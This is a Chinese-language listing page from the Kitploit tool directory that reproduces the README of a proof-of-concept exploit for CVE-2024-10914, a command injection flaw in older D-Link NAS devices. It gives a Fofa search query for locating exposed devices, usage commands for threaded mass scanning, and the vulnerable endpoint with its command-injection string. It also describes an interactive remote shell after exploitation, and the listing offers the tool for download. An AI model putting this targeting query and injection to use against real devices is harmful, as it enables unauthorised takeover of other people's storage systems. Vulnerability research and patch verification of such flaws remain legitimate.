Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2024-10914 — CVE-2024-10914 是一个严重命令注入漏洞,影响多款旧版D-Link网络附加存储(NAS)设备。 | Kitploit
工具/GitHubGitHub/themehackers/cve-2024-10914
侦察漏洞分析漏洞利用Web应用程序漏洞利用渗透测试命令与控制学习与教育
GitHubthemehackers/cve-2024-10914

CVE-2024-10914

CVE-2024-10914 是一个严重命令注入漏洞,影响多款旧版D-Link网络附加存储(NAS)设备。

查看仓库
921年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2024-10914 - D-Link 远程代码执行 (RCE) 漏洞利用

此脚本是针对 CVE-2024-10914 的概念验证 (PoC) 漏洞利用程序,该漏洞存在于某些 D-Link 设备中。该脚本用于识别并利用易受攻击的设备执行任意命令。

注意: 此脚本仅应用于教育目的或经授权的环境中。未经授权利用此漏洞可能属于非法且不道德的行为。


root@kitploit:~
Finding Targets
To find potential targets, use Fofa (similar to Shodan.io):

Fofa Dork: app="D_Link-DNS-ShareCenter" && server=="lighttpd/1.4.25-devel-fb150ff"

功能特性

  • 漏洞检测:脚本可检查目标是否存在 CVE-2024-10914 漏洞。
  • 漏洞利用:通过发送载荷获取远程命令执行能力。
  • 交互式 Shell:漏洞利用成功后,将启动交互式 Shell 以执行更多命令。
  • 多目标扫描:从文件中读取多个目标,使用多线程实现快速漏洞检测。

依赖要求

  • Python 3.x
  • requests(用于 HTTP 请求)
  • alive-progress(用于进度条)
  • prompt_toolkit(用于交互式 Shell)
  • argparse(用于处理命令行参数)

安装所需库,请执行:

root@kitploit:~
pip3 install -r requirements.txt

命令行参数

root@kitploit:~
usage: exploit.py [-h] [-u URL] [-f FILE] [-t THREADS] [-p PORT]

A PoC exploit for CVE-2024-10914 - D-Link Remote Code Execution (RCE)

optional arguments:
  -h, --help            Show this help message and exit
  -u URL, --url URL     Single target IP to test (e.g., 192.168.1.1)
  -f FILE, --file FILE  File containing list of target IPs to scan
  -t THREADS, --threads THREADS
                        Number of threads to use for scanning (default: 5)
  -p PORT, --port PORT  Port to target (default: 80)

使用示例

  • 检测单个目标:
root@kitploit:~
python3 exploit.py -u 192.168.1.100 -p 80

从文件扫描多个目标

root@kitploit:~
python3 exploit.py -f targets.txt -p 80 -t 10

漏洞利用详情

此脚本尝试利用 D-Link 设备中的漏洞,具体针对以下内容:

  • 易受攻击的端点:/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=';{};'
  • 载荷:各种系统命令(id、uname -a、hostname、cat /proc/cpuinfo 等) 漏洞利用通过将系统命令注入到易受攻击的端点中实现,从而在目标设备上触发任意命令的远程执行。

免责声明

此脚本仅供教育目的使用。请勿在未经明确许可的系统或网络上使用此脚本。

作者对此工具的任何滥用行为概不负责。

更多详情,请参考官方 GitHub 仓库: https://github.com/ThemeHackers/CVE-2024-10914

贡献指南

如果您发现任何问题或希望贡献代码,欢迎在 GitHub 仓库中开启 Issue 或提交 Pull Request。

许可证

本项目基于 MIT 许可证授权 - 详细信息请参阅 LICENSE 文件

README 关键部分:

root@kitploit:~
MIT License

Copyright (c) 2024 ds_zct

Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
下载工具